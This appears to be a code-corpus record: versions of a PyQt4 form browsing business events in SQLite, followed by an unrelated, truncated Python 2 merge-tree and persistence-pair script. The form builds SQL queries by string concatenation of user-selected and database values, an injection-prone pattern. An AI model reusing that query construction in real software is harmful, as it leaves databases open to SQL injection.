if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\n \"Select Name from Cities where ID = '\" + query.value(3)\n .toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem('Destination')\n modelInputValue = QtGui.QStandardItem(query_Destination.\n value(0).toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem('Weight')\n modelInputValue = QtGui.QStandardItem(query.value(4).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem('Volume')\n modelInputValue = QtGui.QStandardItem(query.value(5).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem('Time of Entry')\n modelInputValue = QtGui.QStandardItem(query.value(6).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem('Priority')\n modelInputValue = QtGui.QStandardItem(query.value(7).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per Gram')\n modelInputValue = QtGui.QStandardItem(query.value(8).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per CC')\n modelInputValue = QtGui.QStandardItem(query.value(9).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem('Company')\n modelInputValue = QtGui.QStandardItem(query.value(10).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem('Transport Type')\n modelInputValue = QtGui.QStandardItem(query.value(11).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem('Day of the Week')\n modelInputValue = QtGui.QStandardItem(query.value(12).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem('Frequency')\n modelInputValue = QtGui.QStandardItem(query.value(13).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem('Duration')\n modelInputValue = QtGui.QStandardItem(query.value(14).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate('Form', 'No Records found', None))\n self.inWork = False\n else:\n self.label_3.setText(_translate('Form', '', None))\n self.inWork = True\n self.tb_EventViewer.setModel(modelView)\n\n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n\n def clicked_bt_Later(self):\n if self.eventSkip > 0:\n self.eventSkip = self.eventSkip - 1\n self.handleChanged(self.cb_EventType.currentText())\n\n\nclass Database:\n\n def __init__(self, parent=None):\n self.data = QtSql.QSqlDatabase.addDatabase('QSQLITE')\n self.data.setDatabaseName('../Database/Business.db')\n self.data.open()\n",
"step-4": "from PyQt4 import QtCore, QtGui, QtSql\nimport sqlite3\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n\n def _fromUtf8(s):\n return s\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\n\nclass Ui_Form(object):\n\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8('Form'))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0\n self.db = Database()\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n self.inWork = True\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8('tb_EventViewer'))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8('bt_Earlier'))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8('bt_Later'))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText,\n brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI Light'))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8('label'))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8('cb_EventType'))\n self.cb_EventType.currentIndexChanged['QString'].connect(self.\n handleChanged)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI'))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8('label_2'))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8('label_3'))\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate('Form', 'Revisit business events', None)\n )\n self.bt_Earlier.setText(_translate('Form', '<<', None))\n self.bt_Later.setText(_translate('Form', '>>', None))\n self.label.setText(_translate('Form', 'Revisit business events', None))\n self.label_2.setText(_translate('Form', 'Select Event Type', None))\n\n def initialize(self):\n self.cb_EventType.addItems(self.getBusinessEventsType())\n\n def getBusinessEventsType(self):\n conn = sqlite3.connect('../Database/Business.db')\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n\n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n query.exec_(\n \"Select * from BusinessEvents a, EventTypes b where b.Event = '\" +\n text +\n \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" +\n str(self.eventSkip) + ',1')\n recCount = 0\n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" +\n query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem('Origin')\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0)\n .toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\n \"Select Name from Cities where ID = '\" + query.value(3)\n .toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem('Destination')\n modelInputValue = QtGui.QStandardItem(query_Destination.\n value(0).toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem('Weight')\n modelInputValue = QtGui.QStandardItem(query.value(4).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem('Volume')\n modelInputValue = QtGui.QStandardItem(query.value(5).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem('Time of Entry')\n modelInputValue = QtGui.QStandardItem(query.value(6).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem('Priority')\n modelInputValue = QtGui.QStandardItem(query.value(7).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per Gram')\n modelInputValue = QtGui.QStandardItem(query.value(8).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per CC')\n modelInputValue = QtGui.QStandardItem(query.value(9).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem('Company')\n modelInputValue = QtGui.QStandardItem(query.value(10).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem('Transport Type')\n modelInputValue = QtGui.QStandardItem(query.value(11).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem('Day of the Week')\n modelInputValue = QtGui.QStandardItem(query.value(12).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem('Frequency')\n modelInputValue = QtGui.QStandardItem(query.value(13).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem('Duration')\n modelInputValue = QtGui.QStandardItem(query.value(14).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate('Form', 'No Records found', None))\n self.inWork = False\n else:\n self.label_3.setText(_translate('Form', '', None))\n self.inWork = True\n self.tb_EventViewer.setModel(modelView)\n\n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n\n def clicked_bt_Later(self):\n if self.eventSkip > 0:\n self.eventSkip = self.eventSkip - 1\n self.handleChanged(self.cb_EventType.currentText())\n\n\nclass Database:\n\n def __init__(self, parent=None):\n self.data = QtSql.QSqlDatabase.addDatabase('QSQLITE')\n self.data.setDatabaseName('../Database/Business.db')\n self.data.open()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'KPS_RevisitBusinessEvents.ui'\n#\n# Created: Sun May 18 14:50:49 2014\n# by: PyQt4 UI code generator 4.10.4\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt4 import QtCore, QtGui, QtSql\nimport sqlite3\n\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\nclass Ui_Form(object):\n \n \n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8(\"Form\"))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0;\n self.db = Database()\n \n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern) \n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n \n self.inWork = True\n \n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern) \n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n \n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n \n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n \n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n \n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8(\"tb_EventViewer\"))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n # self.tb_EventViewer.setColumnCount(0)\n # self.tb_EventViewer.setRowCount(0)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8(\"bt_Earlier\"))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n \n \n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8(\"bt_Later\"))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n \n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8(\"Segoe UI Light\"))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8(\"label\"))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8(\"cb_EventType\")) \n self.cb_EventType.currentIndexChanged['QString'].connect(self.handleChanged) \n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n \n self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n \n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8(\"Segoe UI\"))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8(\"label_2\"))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8(\"label_3\"))\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate(\"Form\", \"Revisit business events\", None))\n self.bt_Earlier.setText(_translate(\"Form\", \"<<\", None))\n self.bt_Later.setText(_translate(\"Form\", \">>\", None))\n self.label.setText(_translate(\"Form\", \"Revisit business events\", None))\n self.label_2.setText(_translate(\"Form\", \"Select Event Type\", None))\n \n \n def initialize(self):\n self.cb_EventType.addItems(self.getBusinessEventsType())\n # self.cb_Destination.addItems(RH.getLocations())\n \n def getBusinessEventsType(self):\n conn = sqlite3.connect(\"../Database/Business.db\")\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n \n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n\n query.exec_(\"Select * from BusinessEvents a, EventTypes b where b.Event = '\" + text + \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" + str(self.eventSkip) + \",1\")\n recCount = 0;\n \n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" + query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem(\"Origin\")\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0).toString())\n modelView.appendRow([modelInputItem,modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\"Select Name from Cities where ID = '\" + query.value(3).toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem(\"Destination\")\n modelInputValue = QtGui.QStandardItem(query_Destination.value(0).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Weight\")\n modelInputValue = QtGui.QStandardItem(query.value(4).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Volume\")\n modelInputValue = QtGui.QStandardItem(query.value(5).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Time of Entry\")\n modelInputValue = QtGui.QStandardItem(query.value(6).toString())\n modelView.appendRow([modelInputItem,modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Priority\")\n modelInputValue = QtGui.QStandardItem(query.value(7).toString())\n modelView.appendRow([modelInputItem,modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Price Per Gram\")\n modelInputValue = QtGui.QStandardItem(query.value(8).toString())\n modelView.appendRow([modelInputItem,modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Price Per CC\")\n modelInputValue = QtGui.QStandardItem(query.value(9).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Company\")\n modelInputValue = QtGui.QStandardItem(query.value(10).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Transport Type\")\n modelInputValue = QtGui.QStandardItem(query.value(11).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Day of the Week\")\n modelInputValue = QtGui.QStandardItem(query.value(12).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Frequency\")\n modelInputValue = QtGui.QStandardItem(query.value(13).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Duration\")\n modelInputValue = QtGui.QStandardItem(query.value(14).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n #modelInputValue = QtGui.QStandardItem('Value')\n # modelView.appendRow([modelInputItem,modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate(\"Form\", \"No Records found\", None))\n self.inWork = False\n else:\n self.label_3.setText(_translate(\"Form\", \"\", None))\n self.inWork = True\n \n self.tb_EventViewer.setModel(modelView)\n \n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n \n def clicked_bt_Later(self):\n if self.eventSkip > 0:\n self.eventSkip = self.eventSkip - 1 \n self.handleChanged(self.cb_EventType.currentText())\n \nclass Database:\n def __init__(self, parent = None):\n self.data = QtSql.QSqlDatabase.addDatabase(\"QSQLITE\")\n self.data.setDatabaseName(\"../Database/Business.db\")\n self.data.open()\n",
"step-ids": [
8,
10,
11,
12,
13
]
}
|
[
8,
10,
11,
12,
13
] |
from helper import *
tree_type = TREE_TYPE_SPLIT
file_name = ''
file_path = ''
split_scalars = {}
visited = {}
adjacency = {}
pairs = {}
index_map = {}
postorder_map = {}
preorder_map = {}
birth = {}
death = {}
string = ''
class Tree(object):
def __init__(self):
self.index = None
self.children = []
self.parent = None
self.label = None
self.pair = None
self.birth = None
self.death = None
self.postorder = None
self.preorder = None
def __str__(self):
return str(self.index)
def initialize_tree(index):
root = Tree()
root.index = index
root.label = split_scalars[index]
root.pair = pairs[index]
# add mapping to dictionary
index_map[index] = root
return root
def add_node(index, parent):
node = Tree()
node.index = index
parent.children.append(node)
node.parent = parent
node.label = split_scalars[index]
node.pair = pairs[index]
# add mapping to dictionary
index_map[index] = node
return node
def compare_nodes(a, b):
# try to sort using the split_scalars
# if they are equal, sort using index value
if split_scalars[a] > split_scalars[b]:
return 1
elif split_scalars[a] == split_scalars[b]:
if a > b:
return 1
else:
return -1
else:
return -1
def traverse(index, parent):
#print index, split_scalars[index]
visited[index] = True
adjacency[index].sort(compare_nodes)
for node in adjacency[index]:
if not visited[node]:
current = add_node(node, parent)
traverse(node, current)
def add_pairs(node):
if(node == None):
return
else:
node.pair = index_map[pairs[node.index]]
node.birth = index_map[birth[node.index]]
node.death = index_map[death[node.index]]
for child in node.children:
add_pairs(child)
def postorder(node):
# python needs a mutable object for updation
order = {'index': 1}
def set_order(node):
if(node == None):
return
else:
for child in node.children:
set_order(child)
node.postorder = order['index']
postorder_map[order['index']] = node
order['index'] += 1
set_order(node)
def preorder(node):
# python needs a mutable object for updation
order = {'index': 1}
def set_order(node):
if(node == None):
return
else:
node.preorder = order['index']
preorder_map[order['index']] = node
order['index'] += 1
for child in node.children:
set_order(child)
set_order(node)
def stringify_tree(node):
global string
if(node == None):
return
else:
string += '{'
string += str(node.postorder) + '|'
string += str(node.index) + '|'
string += str(node.label) + '|'
string += str(node.birth.label) + '|'
string += str(node.death.label)
for child in node.children:
stringify_tree(child)
string += '}'
return string
def get_merge_tree():
# Get merge tree path
tree_file_arguments = [tree_type, TREE_INFIX, file_name, CSV_EXTENSION]
tree_file_path = get_output_path(file_path, tree_file_arguments, folder_name = TREES_FOLDER)
# Read merge tree file
with open(tree_file_path, 'rb') as csvfile:
csvfile.readline()
spamreader = csv.reader(csvfile, delimiter=' ')
for r in spamreader:
row = r[0].split(',')
node1 = int(row[0])
node2 = int(row[1])
split_scalars[node1] = float(row[2])
split_scalars[node2] = float(row[3])
visited[node1] = False
visited[node2] = False
if node1 not in adjacency.keys():
adjacency[node1] = []
if node2 not in adjacency.keys():
adjacency[node2] = []
adjacency[node1].append(node2)
adjacency[node2].append(node1)
for i in adjacency.keys():
if len(adjacency[i]) == 1:
if (split_scalars[i] < split_scalars[adjacency[i][0]]):
root = i
return root
def get_persistent_pairs():
# Get persistence pairs
pairs_file_arguments = [tree_type, PAIRS_INFIX, file_name, CSV_EXTENSION]
pairs_file_path = get_output_path(file_path, pairs_file_arguments, folder_name = PAIRS_FOLDER)
with open(pairs_file_path, 'rb') as persistence_pairs:
persistence_pairs.readline()
spamreader = csv.reader(persistence_pairs, delimiter=' ')
for r in spamreader:
row = r[0].split(',')
node1 = int(row[0])
node2 = int(row[1])
#if (node1 in split_scalars.keys()) and (node2 in split_scalars.keys()):
# there will be pairs that do not exist in the merge tree
# they will be removed/ignored subsequently
pairs[node1] = node2
pairs[node2] = node1
# add birth and death values of nodes to dictionaries
birth[node1] = node1
death[node1] = node2
birth[node2] = node1
death[node2] = node2
def write_tree(node):
tuple_file_arguments = [file_name, TXT_EXTENSION]
tuple_file_path = get_output_path(file_path, tuple_file_arguments, folder_name = TUPLES_FOLDER)
tuple_file = open(tuple_file_path, 'w')
fieldnames = ['timestep', 'postorder', 'value', 'birth', 'death']
writer = csv.writer(tuple_file, delimiter=',')
writer.writerow(fieldnames)
def pretty_print_tree(node):
if(node == None):
return
else:
timestep = file_name.split('tv_')[1]
values = [timestep, node.postorder, node.label, node.birth.label, node.death.label]
writer.writerow(values)
for child in node.children:
pretty_print_tree(child)
pretty_print_tree(node)
def print_treemap(node):
processed_nodes = {}
treemap_string = {}
treemap_value = {}
treemap_parent = {}
treemap_container = {}
def find_treemap_parent(node):
if node.preorder not in processed_nodes:
parent_node = node.parent
paired_node = node.pair
parent_found = False
# keep going up the merge tree till you find a parent that itself and its pair within the range
while((parent_node != None) and (parent_found == False)):
if parent_node.preorder < node.preorder < parent_node.pair.preorder:
parent_found = True
else:
parent_node = parent_node.parent
if not parent_found:
treemap_container[node.preorder] = str(node.preorder)
treemap_parent[node] = None
treemap_parent[node.pair] = node
else:
treemap_container[node.preorder] = treemap_container[parent_node.preorder] + "." + str(node.preorder)
treemap_parent[node.pair] = node
treemap_parent[node] = parent_node
treemap_string[node.preorder] = treemap_container[node.preorder] + "." + str(node.preorder)
treemap_string[node.pair.preorder] = treemap_container[node.preorder] + "." + str(node.pair.preorder)
treemap_value[node.pair.preorder] = node.pair.label
treemap_value[node.preorder] = node.label
processed_nodes[node.preorder] = True
processed_nodes[node.pair.preorder] = True
def get_tree_structure(node):
if(node == None):
return
else:
find_treemap_parent(node)
for child in node.children:
get_tree_structure(child)
get_tree_structure(node)
for key in treemap_container.keys():
print str(treemap_container[key]) + ","
for key in treemap_string.keys():
print str(treemap_string[key]) + ","+ str(int((treemap_value[key]+0.05)*1000))
def print_label(node):
